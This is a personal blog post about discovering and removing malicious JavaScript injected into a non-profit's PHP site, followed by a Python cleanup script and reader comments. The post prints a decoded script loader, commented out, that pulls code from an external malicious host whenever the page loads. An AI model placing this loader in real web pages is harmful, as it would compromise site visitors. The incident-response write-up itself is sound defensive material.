Website Virus Detection


Today I officially became the webmaster of a non-profit organization. Their website had been shut down by the hosting company because they found malware (a "virus", as everyone kept calling it) on the site.

This was actually the first time I had encountered such an issue. We called the hosting company and asked whether they knew where the virus came from and how we got infected. The technical support person told us that the virus had been detected by their system, but that they didn't know exactly where it was. He mentioned a few common causes they had seen, such as a modified .htaccess file, an iframe added to one of our pages, or a SQL injection into our database, and suggested that we download the code and scan it with anti-virus software.

The first thing I did was check the .htaccess file, and all I found was code redirecting the site to the hosting company's generic access-denied page. I guessed that if there had been any malicious code in that file, it had already been cleaned, which is good overall, but not good for tracing the virus.

Next, I downloaded the site and ran it through Norton Anti-Virus first, but found nothing. I then ran it through another tool called MalwareBytes' Anti-Malware, hoping, as the name suggested, that it would be good at finding malware. It found nothing either.

I searched Google for "Website, Virus" and found a link about websites being attacked by having JavaScript inserted into each page that calls a PHP page on another website. I tried to find out whether it was the same scenario for our website by searching for "http://" across all of our pages, but every reference I found was valid.

Two hours in and still in the middle of nowhere, I found the following piece of code at the end of our index.php file. I copied the code into Notepad, and here is a screenshot of it.

It's really hard to figure out what it does, but when code is written in such a bad format it can't be anything good. I copied the code into a script editor and tried to decode it. I slowly figured out that there is a function O(Cp, I) defined in this spaghetti code that is used to encode strings. I wrote a separate JavaScript to collect all the values assigned through function O, and oh yeah, I decoded the following words:

appendChild
/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php
8080
body
createElement
http: //sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:
setAttribute
onload

In the end, it's not hard to figure out what it was doing. The decoded strings are the building blocks of a classic script loader: create a script element, point its src at an external host and port, mark it deferred, and append it to the body once the page has loaded.

/*
window["onload"] = function()
{
    var element = document.createElement("script");
    element.src = "http://sun-com.ifolder.ru.fanpop-com.cybertagonline.ru:8080/autohome.com.cn/autohome.com.cn/39.net/google.com/btjunkie.org.php";
    element.setAttribute("defer", "1");
    document.body.appendChild(element);

};
*/

It loads a PHP page from a Russian website whenever the home page of this organization is visited. I found three files with the code inserted. I still need to compare the site with an old version before I request that the site be restored.

I still need to find out how the code was inserted into our pages and mend the security flaws, if there are any, but so far I think I really deserve some beers.

————– 3/29/2010 Update —————–

The code had been inserted into every index.php file and every .js file on the site. First I tried to delete it manually, but the script still popped up when I visited a certain page. I read through the code and found a subfolder used by a third-party component that has about 10 subfolders in it, each containing 3 to 10 JavaScript files. There was no way I could clean them all by hand, so I downloaded all the code to my local machine and decided to do a bulk replacement with Microsoft Visual Studio. (Yeah, mostly I'm a .NET guy, and I know this is overkill.) Here is the procedure:

  1. File -> Open -> Website, and on the File System screen that pops up, select the root folder of the affected website.
  2. Visual Studio will ask whether you want to convert the website to a newer .NET version. Select No, because we don't want to compile it in .NET at all.
  3. Edit -> Find and Replace -> Replace in Files; put the malicious script in the Find What box, leave the Replace With box empty, and select Entire Solution.
  4. Click the Replace All button, and Visual Studio will do all the dirty work for you.
  5. After it's done, save all files. You probably want to test everything on your local machine and upload the site only after everything works.

I only use gPHPEdit and BlueFish on Linux for PHP editing, and neither can do what I did with Visual Studio, so I can't comment on which tools you can use for bulk replacement, but I'm sure any tool that lets you create a project should have a Replace All in Project feature.
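The comparison against an old copy of the site and the bulk removal procedure above, as an added Python example that is not part of the original post: it hashes the live site against a known-good copy to list added and modified files, then strips an injected block from every PHP/JS/HTML file with a dry-run preview, keeping each original as <name>.infected. The injected string and the host in it are constructed placeholders, not the indicators from the post.

```python
import hashlib
import tempfile
from pathlib import Path

# Constructed stand-in for the appended loader (placeholder host, not a real one);
# on a real site, copy the exact injected bytes from one infected file as the key.
INJECTED = (b'<script>window["onload"]=function(){var e=document.createElement("script");'
            b'e.src="http://injected-host.example:8080/loader.php";'
            b'e.setAttribute("defer","1");document.body.appendChild(e);};</script>')

def _files(root):
    """Yield (relative posix path, Path) for every regular file under root."""
    return ((p.relative_to(root).as_posix(), p) for p in Path(root).rglob("*") if p.is_file())

def diff_trees(clean_root, live_root):
    """Known-good copy vs live site: sorted (added, modified) relative paths; new files matter too."""
    clean = {rel: hashlib.sha256(p.read_bytes()).digest() for rel, p in _files(clean_root)}
    live = {rel: hashlib.sha256(p.read_bytes()).digest() for rel, p in _files(live_root)}
    added = sorted(rel for rel in live if rel not in clean)
    modified = sorted(rel for rel in live if rel in clean and clean[rel] != live[rel])
    return added, modified

def clean_tree(root, key, dry_run=True, exts=(".php", ".js", ".html", ".htm")):
    """Strip every copy of `key` from each text file under root -> {rel_path: copies}.
    With dry_run=False the original is kept beside the cleaned file as <name>.infected."""
    report = {}
    for rel, p in _files(root):
        data = p.read_bytes() if p.suffix.lower() in exts else b""
        if key in data:
            report[rel] = data.count(key)
            if not dry_run:
                p.with_name(p.name + ".infected").write_bytes(data)  # keep the evidence
                p.write_bytes(data.replace(key, b""))
    return report

def demo():
    """Constructed site and clean backup in a temp dir -> (added, modified, preview, after)."""
    base = Path(tempfile.mkdtemp())
    for d in ("backup", "live"):
        (base / d / "lib").mkdir(parents=True)
        (base / d / "index.php").write_bytes(b"<?php echo 'home'; ?>\n")
        (base / d / "lib" / "app.js").write_bytes(b"var x = 1;\n")
    live = base / "live"
    (live / "index.php").write_bytes(b"<?php echo 'home'; ?>\n" + INJECTED)
    (live / "lib" / "app.js").write_bytes(b"var x = 1;\n" + INJECTED * 2)
    (live / "lib" / "extra.php").write_bytes(b"<?php /* not in backup */ ?>\n")
    added, modified = diff_trees(base / "backup", live)
    preview = clean_tree(live, INJECTED, dry_run=True)
    clean_tree(live, INJECTED, dry_run=False)
    return added, modified, preview, clean_tree(live, INJECTED, dry_run=True)
```

Run the dry-run first and read the report; a file that is modified but contains no copy of the key is exactly the kind of thing (a second payload, a new file) a blind Replace All would miss.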

Fight the Virus, and happy coding!


10 comments

  1. hi my site has been infected too. What it does is insert code at the end of every index.php & html & also all files with .jd extension. I already removed the code from the infected files but I still see the russian site loading in my browser status bar. Let me know if you find a removal tool. thanks

    1. Hi Julio,

      Thanks for visiting my site. I had the same headache when I tried to clean the scripts manually. They still popped up when I visited a certain page. I read through the code and found a subfolder used by a third-party component that has about 10 subfolders in it, each containing 3 to 10 JavaScript files. There was no way I could clean them all by hand, so I downloaded all the code to my local machine and decided to do a bulk replacement with Microsoft Visual Studio. If you have that tool, you can read my blog for the procedure on how to clean them up.

      I only use gPHPEdit and BlueFish on Linux for PHP editing, and neither can do what I did with Visual Studio, so I can't comment on which tools you can use for bulk replacement, but I'm sure any tool that lets you create a project should have a Replace All in Project feature.

  2. My site is also infected with the same thing. It places a JS in all index and js files. I delete them all manually and the site will be OK for the next 10 days, and later it gets infected again. I have 5 websites in my account and all 5 websites get infected. I can't find the backhole. Still struggling to get it out.
    How did you come to the conclusion that the third-party component is generating it?

    1. Hi Binu, thanks for sharing your experience here. Well, we built the pages ourselves, and of course we didn't write this, so it must have been generated and inserted by a third party. Actually, our hosting company has some scanning tools that found the virus, and they disabled our site so it would not affect other sites they host. I believe, although I'm not 100% sure, that some PHP security hole gave the hackers your admin login and password. The reason I think this is that not only files in public_html but also all js and index files in your home folder are affected. The only way to get that done is to get your admin password. So,

      Step 1: Change your admin password.
      Step 2: Upgrade PHP to the latest version.

  3. Thanks for your reply.
    Even my ASP.NET sites are affected. I am running on a Windows IIS7 server. I use Notepad++ to find and replace the script in all the files in a folder.

    Are you talking about the FTP password?
    The only PHP app I am using is the vBulletin forum. All the others are ASP and ASP.NET files.

    1. Hmm, for a Windows server, I think the FTP login has probably been compromised. I'm not familiar with vBulletin. You can search to see if anyone has posted any security issues with it.

  4. Hello there I am so grateful I found your blog, I really found you by mistake,
    while I was looking on DuckDuckGo for something else, Nonetheless I am here now and would just like to
    say thank you for a incredible post and a all round interesting blog (I also love the theme/design), I don’t
    have time to read through it all at the minute but I have bookmarked it and also included your
    RSS feeds, so when I have time I will be back to read
    a lot more, Please do keep up the excellent jo.

  5. If the desired domain is registered already then check the Whois details in
    network solutions for the registered owner details.
    Use your actual dba (Doing Business As) and physical address.
    ” POP mailboxes and web mail services: The use of the POP mailboxes is important and this is the reason it is best to use it to offer every departments and staff a different email id.
